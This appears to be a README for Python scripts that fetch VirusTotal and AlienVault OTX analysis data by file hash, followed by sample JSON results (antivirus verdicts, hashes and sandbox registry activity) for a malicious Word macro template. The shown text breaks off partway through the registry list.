Online search hashes-based on VirusTotal-OTX
The Python Scripts are usefu for downloading json static / dynamic malware analysis and comments from VirusTotal and OTX Alienvault.
Author :
LinkedIn : @Vito Lucatorto
Usage
Download VirusTotal - Static Analysis
python3 VirusTotal_static_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download VirusTotal - Dynamic Analysis
python3 VirusTotal_dynamic_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download VirusTotal - Comments
python3 VirusTotal_v3_comments.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Download AlienVault - Static & Dynamic
python3 AlienVault_analysis.py --file b553641092e1a15e70f1229cb9ada0a47132f054
Requirements
- Python 3.7 and higher
- Internet Connection (Proxy Support; SSL/TLS interception can be a problem)
Get the API Keys
Virustotal
- Create an account here https://www.virustotal.com/#/join-us
- Check
Profile > My API key
for your public API key
OTX AlienVault
- Create an account here [https://otx.alienvault.com/] (https://otx.alienvault.com/)
- Check
API Integration
here [https://otx.alienvault.com/api] (https://otx.alienvault.com/api)
JSON Results
VirusTotal_static_analysis.py
"data":{
"attributes":{
"type_description":"Office Open XML Document",
"tlsh":"T1DD72BE15C714BC1CD9E08B79806503EDFA0E0153E29556AE3425EAECEB94EAB173DCCE",
"vhash":"6d43f7e34f30cafecd8113b3e404db05",
"trid":[
{
"file_type":"Word Microsoft Office Open XML Format document (with Macro)",
"probability":53
},
{
"file_type":"Word Microsoft Office Open XML Format document",
"probability":23.9
},
{
"file_type":"Open Packaging Conventions container",
"probability":17.8
},
{
"file_type":"ZIP compressed archive",
"probability":4
},
{
"file_type":"PrintFox/Pagefox bitmap (640x800)",
"probability":1
}
],
"creation_date":1606752060,
"names":[
"iencli12.dotm"
],
"last_modification_date":1613479881,
"type_tag":"docx",
"times_submitted":1,
"total_votes":{
"harmless":0,
"malicious":0
},
"size":16636,
"popular_threat_classification":{
"suggested_threat_label":"trojan.msoffice/sload",
"popular_threat_category":[
[
"trojan",
17
],
[
"dropper",
4
]
],
"popular_threat_name":[
[
"msoffice",
3
],
[
"sload",
3
],
[
"w97m",
2
]
]
},
"last_submission_date":1607467413,
"meaningful_name":"iencli12.dotm",
"crowdsourced_ids_stats":{
"info":0,
"high":0,
"medium":2,
"low":0
},
"sandbox_verdicts":{
"C2AE":{
"category":"undetected",
"sandbox_name":"C2AE",
"malware_classification":[
"UNKNOWN_VERDICT"
]
},
"Yomi Hunter":{
"category":"malicious",
"sandbox_name":"Yomi Hunter",
"malware_classification":[
"MALWARE"
]
}
},
"sha256":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"type_extension":"docx",
"tags":[
"open-file",
"exe-pattern",
"url-pattern",
"docx",
"macros",
"hide-app",
"create-ole"
],
"crowdsourced_ids_results":[
{
"rule_category":"Potentially Bad Traffic",
"alert_severity":"medium",
"alert_context":[
{
"src_ip":"10.10.0.121",
"protocol":"IP"
}
],
"rule_msg":"DECODE_IP_OPTION_SET",
"rule_source":"snort",
"rule_id":"444"
},
{
"rule_category":"Attempted Information Leak",
"alert_severity":"medium",
"alert_context":[
{
"src_ip":"10.10.0.121",
"protocol":"UDP",
"src_port":51706
}
],
"rule_msg":"PSNG_UDP_PORTSWEEP_FILTERED",
"rule_source":"snort",
"rule_id":"23"
}
],
"last_analysis_date":1607652080,
"unique_sources":1,
"first_submission_date":1607467413,
"ssdeep":"192:HNmtT7KlBpGK6SICieyOA8MS48TuX63hOZ73Ea5l/aZTbYh7e++9dQEwPwS7mZNq:tmtvKBvnpDALoa5lahYY+ISJkm",
"bundle_info":{
"highest_datetime":"1980-01-01 00:00:00",
"lowest_datetime":"1980-01-01 00:00:00",
"num_children":14,
"extensions":{
"xml":10,
"bin":1
},
"file_types":{
"XML":13,
"Microsoft Office":1
},
"type":"DOCX",
"uncompressed_size":62573
},
"md5":"aa37daeedf69b6d26081c1d6ae5a19c3",
"sha1":"b553641092e1a15e70f1229cb9ada0a47132f054",
"magic":"Zip archive data, at least v2.0 to extract",
"last_analysis_stats":{
"harmless":0,
"type-unsupported":10,
"suspicious":0,
"confirmed-timeout":0,
"timeout":0,
"failure":0,
"malicious":31,
"undetected":35
},
"last_analysis_results":{
"Bkav":{
"category":"undetected",
"engine_name":"Bkav",
"engine_version":"1.3.0.9899",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Elastic":{
"category":"malicious",
"engine_name":"Elastic",
"engine_version":"4.0.13",
"result":"malicious (high confidence)",
"method":"blacklist",
"engine_update":"20201204"
},
"Cynet":{
"category":"malicious",
"engine_name":"Cynet",
"engine_version":"4.0.0.24",
"result":"Malicious (score: 85)",
"method":"blacklist",
"engine_update":"20201211"
},
"FireEye":{
"category":"malicious",
"engine_name":"FireEye",
"engine_version":"32.36.1.0",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"CAT-QuickHeal":{
"category":"undetected",
"engine_name":"CAT-QuickHeal",
"engine_version":"14.00",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ALYac":{
"category":"undetected",
"engine_name":"ALYac",
"engine_version":"1.1.1.5",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Malwarebytes":{
"category":"undetected",
"engine_name":"Malwarebytes",
"engine_version":"3.6.4.335",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Zillya":{
"category":"undetected",
"engine_name":"Zillya",
"engine_version":"2.0.0.4242",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"AegisLab":{
"category":"malicious",
"engine_name":"AegisLab",
"engine_version":"4.2",
"result":"Trojan.MSOffice.SLoad.a!c",
"method":"blacklist",
"engine_update":"20201211"
},
"Paloalto":{
"category":"type-unsupported",
"engine_name":"Paloalto",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Sangfor":{
"category":"undetected",
"engine_name":"Sangfor",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201207"
},
"Trustlook":{
"category":"undetected",
"engine_name":"Trustlook",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Alibaba":{
"category":"malicious",
"engine_name":"Alibaba",
"engine_version":"0.3.0.5",
"result":"TrojanDownloader:VBA/Obfuscation.A",
"method":"blacklist",
"engine_update":"20190527"
},
"K7GW":{
"category":"undetected",
"engine_name":"K7GW",
"engine_version":"11.155.35944",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"K7AntiVirus":{
"category":"undetected",
"engine_name":"K7AntiVirus",
"engine_version":"11.155.35943",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Arcabit":{
"category":"malicious",
"engine_name":"Arcabit",
"engine_version":"1.0.0.881",
"result":"Trojan.Generic.D2AD801C",
"method":"blacklist",
"engine_update":"20201210"
},
"BitDefenderTheta":{
"category":"undetected",
"engine_name":"BitDefenderTheta",
"engine_version":"7.2.37796.0",
"result":null,
"method":"blacklist",
"engine_update":"20201202"
},
"Cyren":{
"category":"malicious",
"engine_name":"Cyren",
"engine_version":"6.3.0.2",
"result":"Trojan.RZRC-5",
"method":"blacklist",
"engine_update":"20201211"
},
"SymantecMobileInsight":{
"category":"type-unsupported",
"engine_name":"SymantecMobileInsight",
"engine_version":"2.0",
"result":null,
"method":"blacklist",
"engine_update":"20200813"
},
"Symantec":{
"category":"malicious",
"engine_name":"Symantec",
"engine_version":"1.13.0.0",
"result":"Trojan.Gen.NPE",
"method":"blacklist",
"engine_update":"20201210"
},
"TotalDefense":{
"category":"undetected",
"engine_name":"TotalDefense",
"engine_version":"37.1.62.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Baidu":{
"category":"undetected",
"engine_name":"Baidu",
"engine_version":"1.0.0.2",
"result":null,
"method":"blacklist",
"engine_update":"20190318"
},
"TrendMicro-HouseCall":{
"category":"malicious",
"engine_name":"TrendMicro-HouseCall",
"engine_version":"10.0.0.1040",
"result":"Trojan.W97M.POWLOAD.THLOIBO",
"method":"blacklist",
"engine_update":"20201210"
},
"Avast":{
"category":"malicious",
"engine_name":"Avast",
"engine_version":"21.1.5827.0",
"result":"Other:Malware-gen [Trj]",
"method":"blacklist",
"engine_update":"20201210"
},
"ClamAV":{
"category":"undetected",
"engine_name":"ClamAV",
"engine_version":"0.102.3.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Kaspersky":{
"category":"malicious",
"engine_name":"Kaspersky",
"engine_version":"15.0.1.13",
"result":"HEUR:Trojan-Downloader.MSOffice.SLoad.gen",
"method":"blacklist",
"engine_update":"20201210"
},
"BitDefender":{
"category":"malicious",
"engine_name":"BitDefender",
"engine_version":"7.2",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201211"
},
"NANO-Antivirus":{
"category":"undetected",
"engine_name":"NANO-Antivirus",
"engine_version":"1.0.146.25241",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"SUPERAntiSpyware":{
"category":"undetected",
"engine_name":"SUPERAntiSpyware",
"engine_version":"5.6.0.1032",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"MicroWorld-eScan":{
"category":"malicious",
"engine_name":"MicroWorld-eScan",
"engine_version":"14.0.409.0",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"APEX":{
"category":"type-unsupported",
"engine_name":"APEX",
"engine_version":"6.107",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Rising":{
"category":"malicious",
"engine_name":"Rising",
"engine_version":"25.0.0.26",
"result":"Dropper.Agent!8.2F (TOPIS:E0:SNE7OOM2KTI)",
"method":"blacklist",
"engine_update":"20201211"
},
"Ad-Aware":{
"category":"malicious",
"engine_name":"Ad-Aware",
"engine_version":"3.0.16.117",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201211"
},
"Sophos":{
"category":"undetected",
"engine_name":"Sophos",
"engine_version":"1.0.2.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Comodo":{
"category":"undetected",
"engine_name":"Comodo",
"engine_version":"33066",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"F-Secure":{
"category":"malicious",
"engine_name":"F-Secure",
"engine_version":"12.0.86.52",
"result":"Malware.VBS/Drop.Agent.lepeo",
"method":"blacklist",
"engine_update":"20201210"
},
"DrWeb":{
"category":"undetected",
"engine_name":"DrWeb",
"engine_version":"7.0.49.9080",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"VIPRE":{
"category":"undetected",
"engine_name":"VIPRE",
"engine_version":"88836",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"TrendMicro":{
"category":"malicious",
"engine_name":"TrendMicro",
"engine_version":"11.0.0.1006",
"result":"Trojan.W97M.POWLOAD.THLOIBO",
"method":"blacklist",
"engine_update":"20201210"
},
"McAfee-GW-Edition":{
"category":"malicious",
"engine_name":"McAfee-GW-Edition",
"engine_version":"v2019.1.2+3728",
"result":"BehavesLike.Downloader.lc",
"method":"blacklist",
"engine_update":"20201211"
},
"Trapmine":{
"category":"type-unsupported",
"engine_name":"Trapmine",
"engine_version":"3.5.0.1023",
"result":null,
"method":"blacklist",
"engine_update":"20200727"
},
"CMC":{
"category":"undetected",
"engine_name":"CMC",
"engine_version":"2.10.2019.1",
"result":null,
"method":"blacklist",
"engine_update":"20201204"
},
"Emsisoft":{
"category":"malicious",
"engine_name":"Emsisoft",
"engine_version":"2018.12.0.1641",
"result":"Trojan.GenericKD.44924956 (B)",
"method":"blacklist",
"engine_update":"20201211"
},
"Ikarus":{
"category":"malicious",
"engine_name":"Ikarus",
"engine_version":"0.1.5.2",
"result":"Trojan-Dropper.VBA.Agent",
"method":"blacklist",
"engine_update":"20201210"
},
"Avast-Mobile":{
"category":"undetected",
"engine_name":"Avast-Mobile",
"engine_version":"201210-00",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Jiangmin":{
"category":"undetected",
"engine_name":"Jiangmin",
"engine_version":"16.0.100",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Webroot":{
"category":"type-unsupported",
"engine_name":"Webroot",
"engine_version":"1.0.0.403",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Avira":{
"category":"malicious",
"engine_name":"Avira",
"engine_version":"8.3.3.10",
"result":"VBS/Drop.Agent.lepeo",
"method":"blacklist",
"engine_update":"20201211"
},
"eGambit":{
"category":"type-unsupported",
"engine_name":"eGambit",
"engine_version":null,
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Antiy-AVL":{
"category":"undetected",
"engine_name":"Antiy-AVL",
"engine_version":"3.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Kingsoft":{
"category":"undetected",
"engine_name":"Kingsoft",
"engine_version":"2017.9.26.565",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Gridinsoft":{
"category":"malicious",
"engine_name":"Gridinsoft",
"engine_version":"1.0.20.110",
"result":"Trojan.U.Downloader.oa",
"method":"blacklist",
"engine_update":"20201210"
},
"Microsoft":{
"category":"undetected",
"engine_name":"Microsoft",
"engine_version":"1.1.17700.4",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ViRobot":{
"category":"malicious",
"engine_name":"ViRobot",
"engine_version":"2014.3.20.0",
"result":"DOC.Z.Agent.16636",
"method":"blacklist",
"engine_update":"20201210"
},
"ZoneAlarm":{
"category":"malicious",
"engine_name":"ZoneAlarm",
"engine_version":"1.0",
"result":"HEUR:Trojan-Downloader.MSOffice.SLoad.gen",
"method":"blacklist",
"engine_update":"20201210"
},
"GData":{
"category":"malicious",
"engine_name":"GData",
"engine_version":"A:25.27963B:27.21181",
"result":"Trojan.GenericKD.44924956",
"method":"blacklist",
"engine_update":"20201210"
},
"TACHYON":{
"category":"undetected",
"engine_name":"TACHYON",
"engine_version":"2020-12-11.01",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"BitDefenderFalx":{
"category":"type-unsupported",
"engine_name":"BitDefenderFalx",
"engine_version":"2.0.936",
"result":null,
"method":"blacklist",
"engine_update":"20200916"
},
"AhnLab-V3":{
"category":"undetected",
"engine_name":"AhnLab-V3",
"engine_version":"3.19.3.10105",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Acronis":{
"category":"undetected",
"engine_name":"Acronis",
"engine_version":"1.1.1.80",
"result":null,
"method":"blacklist",
"engine_update":"20201023"
},
"McAfee":{
"category":"malicious",
"engine_name":"McAfee",
"engine_version":"6.0.6.653",
"result":"RDN/Generic Downloader.x",
"method":"blacklist",
"engine_update":"20201210"
},
"MAX":{
"category":"malicious",
"engine_name":"MAX",
"engine_version":"2019.9.16.1",
"result":"malware (ai score=87)",
"method":"blacklist",
"engine_update":"20201211"
},
"VBA32":{
"category":"undetected",
"engine_name":"VBA32",
"engine_version":"4.4.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Cylance":{
"category":"type-unsupported",
"engine_name":"Cylance",
"engine_version":"2.3.1.101",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Zoner":{
"category":"undetected",
"engine_name":"Zoner",
"engine_version":"0.0.0.0",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"ESET-NOD32":{
"category":"malicious",
"engine_name":"ESET-NOD32",
"engine_version":"22461",
"result":"a variant of VBA/TrojanDropper.Agent.BRD",
"method":"blacklist",
"engine_update":"20201210"
},
"Tencent":{
"category":"undetected",
"engine_name":"Tencent",
"engine_version":"1.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201211"
},
"Yandex":{
"category":"undetected",
"engine_name":"Yandex",
"engine_version":"5.5.2.24",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"SentinelOne":{
"category":"undetected",
"engine_name":"SentinelOne",
"engine_version":"4.7.0.7",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"MaxSecure":{
"category":"undetected",
"engine_name":"MaxSecure",
"engine_version":"1.0.0.1",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"Fortinet":{
"category":"malicious",
"engine_name":"Fortinet",
"engine_version":"6.2.142.0",
"result":"VBA/Agent.GBWDLEV!tr.dldr",
"method":"blacklist",
"engine_update":"20201210"
},
"AVG":{
"category":"malicious",
"engine_name":"AVG",
"engine_version":"21.1.5827.0",
"result":"Other:Malware-gen [Trj]",
"method":"blacklist",
"engine_update":"20201210"
},
"Cybereason":{
"category":"type-unsupported",
"engine_name":"Cybereason",
"engine_version":"1.2.449",
"result":null,
"method":"blacklist",
"engine_update":"20190616"
},
"Panda":{
"category":"undetected",
"engine_name":"Panda",
"engine_version":"4.6.4.2",
"result":null,
"method":"blacklist",
"engine_update":"20201210"
},
"CrowdStrike":{
"category":"type-unsupported",
"engine_name":"CrowdStrike",
"engine_version":"1.0",
"result":null,
"method":"blacklist",
"engine_update":"20190702"
},
"Qihoo-360":{
"category":"malicious",
"engine_name":"Qihoo-360",
"engine_version":"1.0.0.1120",
"result":"Generic/Trojan.Downloader.3f4",
"method":"blacklist",
"engine_update":"20201211"
}
},
"reputation":0
},
"type":"file",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c"
}
}
VirusTotal_static_analysis.py
{
"meta":{
"count":2
},
"data":[
{
"attributes":{
"verdicts":[
"UNKNOWN_VERDICT"
],
"command_executions":[
"\"%ProgramFiles(x86)%\\Microsoft Office\\Office14\\WINWORD.EXE\" %SAMPLEPATH%"
],
"registry_keys_set":[
{
"value":"LowDateTime:-331231481,HighDateTime:30676316***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ndis.sys[MofResourceName]"
},
{
"value":"LowDateTime:418629328,HighDateTime:30487037***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]"
},
{
"value":"LowDateTime:1237199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]"
},
{
"value":"LowDateTime:-227274444,HighDateTime:30116024***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]"
},
{
"value":"LowDateTime:1137199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]"
},
{
"value":"LowDateTime:302488720,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\advapi32.dll[MofResourceName]"
},
{
"value":"LowDateTime:369951187,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]"
},
{
"value":"LowDateTime:1497199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]"
},
{
"value":"LowDateTime:-377767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]"
},
{
"value":"LowDateTime:382232320,HighDateTime:30016580***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]"
},
{
"value":"LowDateTime:-577767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]"
},
{
"value":"LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\IDE\\DiskAMDX_HARDDISK___________________________2.5+____\\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}"
},
{
"value":"LowDateTime:-445445610,HighDateTime:30778799***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]"
},
{
"value":"LowDateTime:398767260,HighDateTime:30646967***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ACPI.sys[ACPIMOFResource]"
},
{
"value":"LowDateTime:-1637837527,HighDateTime:30762899***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
},
{
"value":"LowDateTime:-649833737,HighDateTime:30733938***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\mssmbios.sys[MofResource]"
},
{
"value":"26507113",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Documents\\LastPurgeTime"
},
{
"value":"4C 00 00 00 A3 01 00 00 01 00 00 00 02 01 FF FF BD 00 00 00 00 00 00 00 00 00 10 00 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 01 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 1B 00 00 00 01 00 42 72",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Data\\Toolbars"
},
{
"value":"PCI\\VEN_8086&DEV_100E&SUBSYS_11001AF4&REV_03\\3&13C0B0C5&0&90",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\{B5DA8633-954C-4495-AE46-0BB5B5FB1CDC}\\Connection\\PnpInstanceID"
},
{
"value":"Global\\MMF_BITS_s",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\BITS\\Performance\\PerfMMFileName"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\\Control\\Linked"
},
{
"value":"\\\\?\\SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\{78032B7E-4968-42D3-9F37-287EA86C0AAA}",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\\SymbolicLink"
},
{
"value":"1",
"key":"HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading"
},
{
"value":"00 00 54 00 45 00 76 00 65 00 6E 00 74 00 4C 00 6F 00 67 00 45 00 76 00 65 00 6E 00 74 00 43 00 6F 00 6E 00 73 00 75 00 6D 00 65 00 72 00",
"key":"HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces"
},
{
"value":"%windir%\\System32\\Bits.log\n",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG"
},
{
"value":"%windir%\\System32\\Bits.bak\n",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
},
{
"value":"6F 3E 2B 00 54 0A 00 00 06 00 00 00 01 00 00 00 4A 00 00 00 02 00 00 00 3A 00 00 00 04 00 00 00 63 00 3A 00 5C 00 74 00 6D 00 70 00 5C 00 7A 00 37 00 67 00 72 00 73 00 37 00 6D 00 71 00 75 00 6F 00 6C 00 70 00 7A 00 62 00 31 00 6C 00 2E 00 64 00 6F 00 63 00 6D 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\o>+"
},
{
"value":"6D 39 2B 00 54 0A 00 00 01 00 00 00 00 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\m9+"
},
{
"value":"38 3A 2B 00 54 0A 00 00 04 00 00 00 00 00 00 00 8E 00 00 00 01 00 00 00 86 00 00 00 3F 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 57 00 41 00 4C 00 4B 00 45 00 52 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 52 00 6F 00 61 00 6D 00 69 00 6E 00 67 00 5C 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 5C 00 54 00 65 00 6D 00 70 00 6C 00 61 00 74 00 65 00 73 00 5C 00 4E 00 6F 00 72 00 6D 00 61 00 6C 00 2E 00 64 00 6F 00 74 00 6D 00 00 00 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems\\8:+"
},
{
"value":"12642",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Counter"
},
{
"value":"12476 12482 12492 12502 12522 12566 12576 12614 12620 12636",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Object List"
},
{
"value":"12643",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Help"
},
{
"value":"12476",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Counter"
},
{
"value":"12477",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Help"
},
{
"value":"WmiApRpl.ini\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000",
"key":"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\PerfIniFile"
},
{
"value":"SW\\{eeab7790-c514-11d1-b42b-00805fc1270e}\\asyncmac",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\DeviceInstance"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\Control\\ReferenceCount"
},
{
"value":"A0 05 00 00 A0 0A A8 86 B7 32 D6 01 00 00 00 00 54 0A 00 00 60 7A A9 AF B7 32 D6 01 00 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\MTTT"
},
{
"value":"1",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\AutoDetect"
},
{
"value":"0",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\\UNCAsIntranet"
},
{
"value":"On",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Common\\LanguageResources\\EnabledLanguages\\1033"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\#\\Control\\Linked"
},
{
"value":"en-US\nen\n",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000_CLASSES\\Local Settings\\MuiCache\\17b\\52C64B7E\\LanguageList"
},
{
"value":"\\\\?\\SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}",
